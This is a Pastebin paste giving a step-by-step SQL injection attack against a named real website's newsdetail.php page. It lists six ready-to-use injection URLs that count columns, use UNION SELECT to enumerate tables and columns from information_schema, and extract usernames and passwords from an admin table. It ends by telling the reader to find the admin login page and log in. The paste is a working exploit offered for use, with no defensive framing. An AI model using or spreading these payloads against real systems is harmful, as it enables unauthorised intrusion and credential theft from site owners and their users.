Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Example Sqli From www.secure-down.org
- 1]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10' <-Error Sql
- 2]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+order+by+11--
- (Find the Number untill no error)
- 3]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+union+select+1,2,3,4,5,6,7,8,9,10,11--
- (Gather All Column Number)
- 4]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11+from+information_schema.tables+where+table_schema=database()--
- (Follow the Fifth Step, We Take the Table Admin-> tbladmin)
- 5]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+union+select+1,2,3,4,5,6,7,group_concat(column_name),9,10,11+from+information_schema.columns+where+table_name=0x74626C61646D696E--
- (Follow the Sixth Step, We Search the Provid Column Username / Password)
- 6]http://www.leadacidbatteryinfo.org/newsdetail.php?id=10+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,username,password),9,10,11+from+tbladmin
- (Last Step, We Already Get Username / Password: D)
- Now You Only Need Search Admin Login Page and login ;)
- Good luck..
- [ SaCCaFrAZi|-=-|www.secure-down.org ]
Add Comment
Please, Sign In to add comment
